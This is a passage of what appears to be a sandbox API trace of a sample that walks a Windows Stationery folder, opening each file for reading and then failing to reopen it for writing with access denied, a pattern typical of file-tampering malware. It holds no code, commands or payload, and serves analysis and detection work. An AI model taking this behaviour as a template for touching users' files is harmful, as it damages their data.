shared\\Stationery\\Roses.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm", lpUsedDefaultChar=0x0) returned 68 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.451] AreFileApisANSI () returned 1 [0102.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0102.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 68 [0102.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.451] GetFileType (hFile=0x27c) returned 0x1 [0102.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0102.452] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.452] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.452] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.452] CloseHandle (hObject=0x27c) returned 1 [0102.452] AreFileApisANSI () returned 1 [0102.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0102.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 68 [0102.453] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.453] GetLastError () returned 0x5 [0102.453] GetLastError () returned 0x5 [0102.453] SetLastError (dwErrCode=0x5) [0102.453] GetLastError () returned 0x5 [0102.453] SetLastError (dwErrCode=0x5) [0102.453] GetLastError () returned 0x5 [0102.453] SetLastError (dwErrCode=0x5) [0102.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0102.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0102.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.453] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96dccc65, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96dccc65, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0102.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.454] AreFileApisANSI () returned 1 [0102.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", lpUsedDefaultChar=0x0) returned 68 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.455] AreFileApisANSI () returned 1 [0102.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x820e8 [0102.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 68 [0102.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.455] GetFileType (hFile=0x27c) returned 0x1 [0102.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0102.456] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.456] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.456] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.456] CloseHandle (hObject=0x27c) returned 1 [0102.456] AreFileApisANSI () returned 1 [0102.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0102.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 68 [0102.457] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.457] GetLastError () returned 0x5 [0102.457] GetLastError () returned 0x5 [0102.457] SetLastError (dwErrCode=0x5) [0102.457] GetLastError () returned 0x5 [0102.457] SetLastError (dwErrCode=0x5) [0102.457] GetLastError () returned 0x5 [0102.457] SetLastError (dwErrCode=0x5) [0102.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0102.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0102.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.457] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0102.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0102.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.458] AreFileApisANSI () returned 1 [0102.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 77 [0102.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0102.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.459] AreFileApisANSI () returned 1 [0102.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0102.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d220 [0102.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8d220, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 77 [0102.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.459] GetFileType (hFile=0x27c) returned 0x1 [0102.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0102.460] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.460] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.460] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.460] CloseHandle (hObject=0x27c) returned 1 [0102.460] AreFileApisANSI () returned 1 [0102.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0102.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d178 [0102.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8d178, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 77 [0102.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.461] GetLastError () returned 0x5 [0102.461] GetLastError () returned 0x5 [0102.461] SetLastError (dwErrCode=0x5) [0102.461] GetLastError () returned 0x5 [0102.461] SetLastError (dwErrCode=0x5) [0102.461] GetLastError () returned 0x5 [0102.461] SetLastError (dwErrCode=0x5) [0102.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0102.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0102.461] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.461] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.461] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0102.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0102.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.463] AreFileApisANSI () returned 1 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft 